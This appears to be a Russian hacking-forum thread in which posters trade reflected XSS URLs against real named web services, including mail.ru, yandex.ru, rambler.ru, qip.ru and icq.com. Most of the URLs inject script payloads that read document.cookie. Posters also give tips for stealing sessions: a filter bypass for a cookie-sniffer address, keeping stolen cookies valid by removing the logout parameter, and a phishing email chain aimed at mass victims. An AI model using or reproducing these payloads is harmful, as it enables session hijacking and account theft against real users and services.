Пассивные xss на почтовых серверах

XSS на юкозe (работает только у авторизованных админов сайта)

Не почтовый сервер, просто не нашел куда засунуть его

 

Пассивная xss на ngs.ru

Code:

http://expert.ngs.ru/search/?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&t=1&r=0

 

Code:

http://www.google.com.ua/imgres?imgurl=http://gogole.com&imgrefurl=[color="Red"]IFRAME_HERE[/color]&h=254&w=340&sz=15D0%25B8%25D1%2582%25D0%25B1%25D1%2583%25D0%25BB%25D1%258C%25D1%2582%25D0%25B5%25D1%2580%25D1%258C%25D0%25B5%25D1%2580&hl=ru&usg=__UzxB7H_92zpHrCDSG-bR5itVNg4=&ei=Lk7fSvurCI-lsAbN0_GlDg&sa=X&oi=image_result&resnum=4&ct=image&ved=0CAwQ9QEwAw

IFRAME

 

хм... никогда этим не занимался. To

Code:

http://calendar.yandex.ru/event-add?show_date=2009-10-22&view_type=%22%27%3E%3Cscript%3Ealert%28%27Irdis%27%29%3C/script%3E

 

пассивки на рамблер

Работает только у авторизованных (пробелы убрать)

 

По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке конечно если разослать миллиону товарищей то возможно эффект будет...

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.

 

пассивная xss на qip.ru


работает только у авторизованных

 

пассивка на mаil.ru, работает только у авторизованных

пассивка на mаil.ru, точку в адресе сниффера ставить в урл уникоде, иначе фильтр может заменить точку в урл на нижнее подчеркивание

 

mail.ru
имя: '"/><script>alert("xss");</script>

© хз​

 

http://email.int.ru/cod/site.php?url=http://mail.live.com&title="><script>alert();</script>

 

такой вариант годится?

http://job.ukr.net/personal/resume/new/?event=Add&Photo%5Bthmb%5D=&Photo%5Bfull%5D="><img src=foo.png onerror=alert(document.cookie) />&RegionId=0&AgreementConfirm=1

 

http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

в фильтре есть дырка ... кто сможет реадизовать ?

 

так гораздо лучше
http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>

запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....

 

http://search.icq.com/search/img_results.php?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ch_id=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

 

Yandex XSS: http://mail.yandex.ru/classic/abook_person?ids=1\');'>');}</script><script>alert()</script>

Вот ещё кучка XSS, которые я где-то выкладывал, что-то уже нерабочее:

Code:

http://rutube.ru/search.html?search=sum41&sort_by=1"><script>alert( 'XSS')</script>&category=1

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script> 

http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script> 

http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script> 

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script> 

http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script> 

http://www.pisem.net/download.php/?file="><script>alert('XSS')</script> 

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> 

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://foto.rambler.ru/introduce.htm...)%3C/script%3E

http://uptime.ru/downtime.php?host_id="><script>alert()</script>"

http://www.speedguide.net/read_articles.php?id="><script>alert()</script>"

http://mail.yandex.ru/r?url=javascript:alert();

 

http://foto.rambler.ru/introduce.html?back='%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://planeta.rambler.ru/community/community/?tags=4049740'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 

Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thread=YUT376A_agent&dateForward=2009-12-22

Видем внизу
Текст:
-«Вылетаю!»
-«Встречайте!»
-написать свой текст <---- он нам и нужен

Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))

 

http://travel.mail.ru/?mod=story&hotel_id=4334&'><''>"><script>alert(/Ruslan1817/)</script>

 

http://afisha.mail.ru/resto_list.html?advs=1&name=&%22%3E%3Cimg%20src=foo.png%20onerror=alert(document.cookie)%20/%3E

 

http://afisha.mail.ru/event.html?placetype=3&%22%3E%3Cimg%20src=foo.png%20onerror=alert(document.cookie)%20/%3E